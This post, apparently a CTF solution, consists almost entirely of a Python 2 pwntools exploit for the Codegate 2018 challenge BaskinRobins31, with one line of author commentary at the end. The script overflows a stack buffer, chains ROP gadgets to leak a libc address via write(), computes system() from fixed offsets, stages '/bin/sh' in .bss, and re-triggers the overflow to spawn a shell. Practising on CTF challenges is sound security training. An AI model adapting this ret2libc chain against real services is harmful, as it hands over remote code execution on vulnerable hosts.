hOwDayS 선린 10720
Codegate 2018 BaskinRobins
```python
# Python 2 / pwntools exploit script for Codegate 2018 BaskinRobins31 (x86-64, no PIE)
from pwn import *

s = process("./BaskinRobins31")
e = ELF("./BaskinRobins31")

write_plt = e.plt["write"]
write_got = e.got["write"]
read_plt = e.plt["read"]
read_got = e.got["read"]

pop3 = 0x40087a        # pop rdi ; pop rsi ; pop rdx ; ret
pop_rdi = 0x400bc3     # pop rdi ; ret
system_offset = 0x45390   # libc offset of system()
read_offset = 0xf7250     # libc offset of read()
bss = 0x602100         # 0x602090 + 0x70, writable scratch area for "/bin/sh"

libc_base = 0
system_addr = 0
payload = ""

def ex_():
    payload = "A" * 184    # padding up to the saved return address

    # stage 1: write(1, read_got, 8) -> leak the resolved address of read()
    payload += p64(pop3)
    payload += p64(1)
    payload += p64(read_got)
    payload += p64(8)
    payload += p64(write_plt)
    # end

    # stage 2: read(0, bss, 8) -> store "/bin/sh\0" in .bss
    payload += p64(pop3)
    payload += p64(0)
    payload += p64(bss)
    payload += p64(len("/bin/sh\00"))
    payload += p64(read_plt)
    # end

    # return to main so the overflow can be triggered a second time
    payload += p64(e.symbols["main"])
    # end

    s.sendline(payload)    # send payload
    print s.recvuntil("Don't break the rules...:( \n")

    # parse the 8-byte leak and compute the libc base from the known read() offset
    read_addr = u64(s.recv(8))
    libc_base = read_addr - read_offset
    system_addr = system_offset + libc_base
    log.info("read_addr : " + hex(read_addr))
    log.info("libc base : " + hex(libc_base))
    log.info("system_addr : " + hex(system_addr))

    # 7 bytes are sent here, although the read() in stage 2 asks for 8 (see the author's note below)
    s.send("/bin/sh")

    # stage 3: system(bss) on the second pass through main
    payload3 = "A" * 184
    # call system
    payload3 += p64(pop_rdi)
    payload3 += p64(bss)
    payload3 += p64(system_addr)
    # end
    s.sendline(payload3)
    sleep(1)
    s.recv(1024)

ex_()
s.interactive()
```
Ugh, I didn't put in the \n.